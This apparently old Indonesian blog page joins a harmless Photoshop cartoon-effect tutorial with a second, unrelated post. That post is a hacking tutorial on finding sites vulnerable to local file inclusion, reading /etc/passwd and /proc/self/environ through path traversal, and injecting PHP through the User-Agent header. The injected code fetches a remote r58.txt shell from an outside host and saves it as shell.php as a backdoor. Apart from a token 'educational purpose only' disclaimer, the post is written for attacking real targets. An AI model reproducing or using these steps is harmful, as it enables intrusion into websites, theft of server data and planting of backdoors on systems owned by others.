wellcome back to blog

Sabtu, 24 Juli 2010

Mengubah Gambar Menjadi Cartoon code:AIS

Tutorial Photoshop Pada kali ini saya akan membuat bagaimana caranya mengedit gambar menjadi cartoon....

Biasanya sering di sebut dengan Trace ( kalo ga salah saya yach.. ) . Ini adalah gambar saya sendiri, kalo pake gambar orang, saya takut orang nya nanti marah hehehehee

Sekarang langsung saja....

1. Buka program Photoshop

2. Pada menu layer, pilih File > Open ( Ctrl + O )
Pilih gambar yang ingin kamu jadikan sebagi object
[Gambar: 24230_1103306000086_1749811355_2001.jpg]

Gambar harus terang dan bersih, agar mengerjakannya tidak sulit. Kalo gambar nya buram, terangin aja gambar nya menggunakan canvas

3. Duplicat layer background Layer > Duplicat Layer ( Ctrl + J )
[Gambar: photoshop_foto_35_clip_image001_-1.jpg]
Gambar harus dikerjakan pada saat layer 1 aktif

4. Pada menu layer, Pilih Filter > Artistic > Poster edges
[Gambar: photoshop_foto_35_clip_image002.jpg]
Maka akan keluar kotak seperti ini...
Atur Resolution nya :
- Edge Thickness = 10 Edge Inthensity = 4 Posterization = 0

Kemudian, klik pada icon yang ada di bawah New Effect Layer ( di samping gambar tong sampah )

Lalu akan keluar kotak berikut :
[Gambar: photoshop_foto_35_clip_image001_000.jpg]
Pilihan harus pada Film Grain, kemudian atur lagi resolusi nya, menjadi :
- Grain = 0 - Highlight Area = 11 - Intensity = 10

Kemudian masih sama dengan yang di atas, klik pada icon New Effect Layer ( di samping tong sampah )

Dan akan keluar kotak seperti di bawah ini :
[Gambar: photoshop_foto_35_clip_image002_000.jpg]
Untuk kali ini, Gambar dipilih dengan Cutout , dan atur kembali resolusi nya menjadi :
- Number of Level = 8 Edge Simplicity = 2 Edge Fidelity = 3

Lalu klik OK....

Gambar akan menjadi seperti ini :
[Gambar: 31942_1135642048467_1749811355_2638.jpg]
Lalu tinggal 1 langkah lagi, maka Gambar Anda akan Selesai. Yaitu,,
Anda tinggal membersihkan Bercak - Bercak Yang tampak Terlihat pada Gambar Tersebut...

Membersihkan Bercak - bercak itu Tidak Sulit kok...

Kamu cukup Menggunakan Healing Brush Tool atau Anda Dapat Menggunakan Keyboard ( J )
Dan akhirnya............................................... Smile
Cling...........
[Gambar: 31942_1135642048467_1749811355_2-2.jpg]
Inilah Gambar yang telah berhasil saya Perbuat.....
oh iya,,,
Sebenarnya, Jari saya Hanya dua yang terbuka, tetapi, saya ambil inisiatif sendiri, untuk mendirikan jari kelingking saya, hingga menajdi tiga yang terbuka...
heheheheehhe

Tutorial ini diarsipkan pada ilmuGRAFIS dalam kategori edit foto dengan judul Mengubah Gambar Menjadi Cartoon code:Jepy

Semoga Sukses
dan
Selamat Mencoba.....

Kalo mau nanya sesuatu / something, ( sok bahasa bule ), Tanya aja yach, jangan malu malu, gapapa kok ahahhaha Big Grin

Semoga Bermanfaat... ^_^ [Gambar: ecg240x320.gif]
hahahaa .. mantabh =}}
hahahah mantabh Big Grin Tongue ~

[Gambar: default_header.jpg]


by. PLANETWORK-TEAM hehehhehehehhehheheehhe silahkan ke forum nya http://planetwork-team.Net :-)

Tutorial Upload Shell Target LFI Dengan Tamper Data

Sebelum nya sorry klw udah ada threat yg sama seperti ini..
tapi saya memberanikan diri untuk membuat threat tutorial ini..setelah saya meminta izin sebelum nya , dan salah satu moderator telah mengijinkan..

ok kita langsung saja..
yang mau saya share di sini ialah tutorial or cara mengupload shell dari target LFI dengan Tamper Data.

########################################

fucking the Web Apps [LFI attack edition]

____ __ __ __
/\ _`\ /\ \ __ /\ \__/\ \
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/
\_/__/
__ __ __ ______ Author: eidelweiss
/\ \ __/\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/
\ \_\ \ \_\
\/_/ \/_/

-=[ upload Shell via Target LFI dengan Tamper Data ]=-

1 - Pendahuluan
2 - Mencari Target LFI
3 - Memeriksa apakah proc / self / environ dapat diakses
4 - Mengupload code shell injection
5 - Akses shell or backdoor kita


=[1]= Pendahuluan

Dalam tutorial ini saya akan coba menunjukkan bagaimana Mencari or mendapatkan target LFI , setelah itu bagai bagaimana kita memanfaat kan target tersebut dan mengupload shell injection (backdoor) kedalam nya.

=[2]= Mencari Target LFI
=> Sekarang saya akan coba memberikan sample or contoh bagaimana cara menemukan target LFI , lets check it.

=> sekarang kita coba mengganti file setelah ?page= (blablabla) dengan ../

Jika kita mendapatkan pesan error seperti ini:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1330

website or target tersebut kemungkinan besar can be attack with LFI ;)

untuk memastikan nya kita masuk ke step berikut nya yaitu mencoba meng access file /etc/passwd , for this step Lets make a request:


jika kita masih mendapat kan pesan error yg sama seperti di atas , berarti kita perlu or coba menambahkan beberapa directory (../../) lagi sampai pesan error hilang dan kita success meng access or menampilkan isi dari file /etc/passwd

contoh klw success akan muncul seperti ini: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

=[3]=Memeriksa apakah proc/self/environ dapat diakses

sekarang mari kita periksa atau check apakah proc/self/environ dapat di access dengan cara mengganti /etc/passwd dengan proc/self/environ

contoh: http://www.target.com/index.php?page=../...etc/passwd <= change etc/passwd with proc/self/environ

it will be like this: http://www.target.com/index.php?page=../...lf/environ

jika success atau proc/self/environ dapat di access , maka kita akan mendapat pesan seperti berikut:

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80


jika gagal atau blank atau error berarti proc/self/environ tidak dapat di access

NB: kemungkinan lain yg menyebab kan proc/self/environ tidak dapat di access ialah web or target kita menggunakan OS (operating system) FreeBSD

=[4]= Mengupload code shell injection (backdoor)

Di step ini kita akan mencoba mengupload shell injection (backdoor) kita ke dalam target yg tadi atau target yg proc/self/environ dapat di access.
Bagaimana caranya ?
Di sinilah peran Tamper data di perlukan.Apa itu Tamper Data ?

NB: Tamper data ialah salah satu Add-ons pada browser mozila yg dapat kita gunakan untuk mengganti user agent atau HTTP Header.

Bagaimana cara menggunakan nya ?
Download dan install terlebih dahulu Tamper Data pada Add-ons mozila anda download here => https://addons.mozilla.org/en-US/firefox/addon/966

setelah tamper data di install , buka tamper data dan pada User-Agent masukan command code sebagai berikut:

http://arizonafusion.com/wp-content/r58.txt -O shell.php');?>

NB: arizonafusion dapat anda ganti dengan link injection anda sendiri jika anda punya atau tidak ingin memakai injection tersebut :)

command code tersebut akan men-download file r58.txt dari arizonafusion.com dan otomatis tersimpan dengan nama shell.php.
jika tidak bekerja coba exec () karena sistem () dapat dinonaktifkan pada webserver dari php.ini

=[5]= Check or Akses shell backdoor kita

Sekarang mari kita periksa apakah script shell (backdoor) kita berhasil atau tersedia pada web target tadi dengan cara membuka:

www.target.com/shell.php

Jika success maka kita akan melihat tampilan backdoor shell kita ;)

This Tutorial is writen for educational purpose only , Author will be not responsible if any damage.

Greats: JosS (hack0wn), h4cky0u.org , yogyacarderlink team , AL-MARHUM , sp3x (securityreason) , r0073r & 0x1D (inj3ct0r) , [D]eal [C]yber , exploit-db


####################=[E0F]=####################